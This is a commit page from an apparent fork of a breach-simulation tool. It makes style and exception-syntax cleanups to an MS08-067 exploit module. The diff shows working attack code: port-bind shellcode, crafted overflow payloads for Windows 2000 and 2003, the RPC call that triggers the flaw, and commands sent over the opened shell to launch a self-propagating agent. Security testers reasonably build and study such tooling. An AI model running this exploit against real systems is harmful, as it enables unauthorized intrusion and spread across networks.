p15693087
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests 1 Projects Releases Wiki Activity

If already touching this file, modify it for PEP8 + better exception syntax.

This commit is contained in:
Daniel Goldberg 2017-09-28 14:17:41 +03:00
parent 48ce135194
commit a27c802b11
1 changed files with 32 additions and 32 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

64
chaos_monkey/exploit/win_ms08_067.py
View File

@ -9,34 +9,35 @@
import sys
import time
import socket
from enum import IntEnum
from logging import getLogger
from model.host import VictimHost
from model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
from . import HostExploiter
from enum import IntEnum
from exploit.tools import SmbTools, get_target_monkey
from network.tools import check_port_tcp
from model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS
from model.host import VictimHost
from network import SMBFinger
from network.tools import check_port_tcp
from tools import build_monkey_commandline
from . import HostExploiter
try:
from impacket import smb
from impacket import uuid
#from impacket.dcerpc import dcerpc
# from impacket.dcerpc import dcerpc
from impacket.dcerpc.v5 import transport
from impacket.smbconnection import SessionError as SessionError1
from impacket.smb import SessionError as SessionError2
from impacket.smb3 import SessionError as SessionError3
except ImportError, exc:
except ImportError as exc:
print str(exc)
print 'Install the following library to make this script work'
print 'Impacket : http://oss.coresecurity.com/projects/impacket.html'
print 'PyCrypto : http://www.amk.ca/python/code/crypto.html'
sys.exit(1)
LOG = getLogger(__name__)
# Portbind shellcode from metasploit; Binds port to TCP port 4444
SHELLCODE = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
SHELLCODE += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
@ -61,8 +62,7 @@ SHELLCODE += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
SHELLCODE += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
SHELLCODE += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
SHELLCODE += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"
# Payload for Windows 2000 target
PAYLOAD_2000 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
PAYLOAD_2000 += '\x41\x41\x41\x41\x41\x41\x41\x41'
@ -76,7 +76,7 @@ PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43'
PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43'
PAYLOAD_2000 += '\xeb\xcc'
PAYLOAD_2000 += '\x00\x00'
# Payload for Windows 2003[SP2] target
PAYLOAD_2003 = '\x41\x00\x5c\x00'
PAYLOAD_2003 += '\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
@ -95,11 +95,11 @@ PAYLOAD_2003 += '\xba\x77\xf9\x75\xbd\x77\x00\x00'
class WindowsVersion(IntEnum):
Windows2000 = 1
Windows2003_SP2 = 2
class SRVSVC_Exploit(object):
TELNET_PORT = 4444
def __init__(self, target_addr, os_version=WindowsVersion.Windows2003_SP2, port=445):
self._port = port
self._target = target_addr
@ -110,33 +110,33 @@ class SRVSVC_Exploit(object):
The port on which the Telnet service will listen.
"""
return SRVSVC_Exploit.TELNET_PORT
def start(self):
"""start() -> socket
Exploit the target machine and return a socket connected to it's
listening Telnet service.
"""
target_rpc_name = "ncacn_np:%s[\\pipe\\browser]" % self._target
LOG.debug("Initiating exploit connection (%s)", target_rpc_name)
self._trans = transport.DCERPCTransportFactory(target_rpc_name)
self._trans.connect()
LOG.debug("Connected to %s", target_rpc_name)
self._dce = self._trans.DCERPC_class(self._trans)
self._dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
dce_packet = self._build_dce_packet()
self._dce.call(0x1f, dce_packet) #0x1f (or 31)- NetPathCanonicalize Operation
self._dce.call(0x1f, dce_packet) # 0x1f (or 31)- NetPathCanonicalize Operation
LOG.debug("Exploit sent to %s successfully...", self._target)
LOG.debug("Target machine should be listening over port %d now", self.get_telnet_port())
sock = socket.socket()
sock.connect((self._target, self.get_telnet_port()))
return sock
@ -162,7 +162,7 @@ class SRVSVC_Exploit(object):
dce_packet += '\x00\x00\x00\x00\x02\x00\x00\x00'
dce_packet += '\x5c\x00\x00\x00\x01\x00\x00\x00'
dce_packet += '\x01\x00\x00\x00'
return dce_packet
@ -186,7 +186,7 @@ class Ms08_067_Exploiter(HostExploiter):
smb_finger = SMBFinger()
if smb_finger.get_host_fingerprint(host):
return host.os.get('type') in self._target_os_type and \
host.os.get('version') in self._windows_versions.keys()
host.os.get('version') in self._windows_versions.keys()
return False
def exploit_host(self, host, depth=-1, src_path=None):
@ -218,7 +218,7 @@ class Ms08_067_Exploiter(HostExploiter):
LOG.debug("Exploited into %r using MS08-067", host)
exploited = True
break
except Exception, exc:
except Exception as exc:
LOG.debug("Error exploiting victim %r: (%s)", host, exc)
continue
@ -256,15 +256,15 @@ class Ms08_067_Exploiter(HostExploiter):
build_monkey_commandline(host, depth - 1)
try:
sock.send("start %s\r\n" % (cmdline, ))
sock.send("net user %s /delete\r\n" % (self._config.ms08_067_remote_user_add, ))
except Exception, exc:
sock.send("start %s\r\n" % (cmdline,))
sock.send("net user %s /delete\r\n" % (self._config.ms08_067_remote_user_add,))
except Exception as exc:
LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", host, exc)
return False
finally:
try:
sock.close()
except:
except socket.error:
pass
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",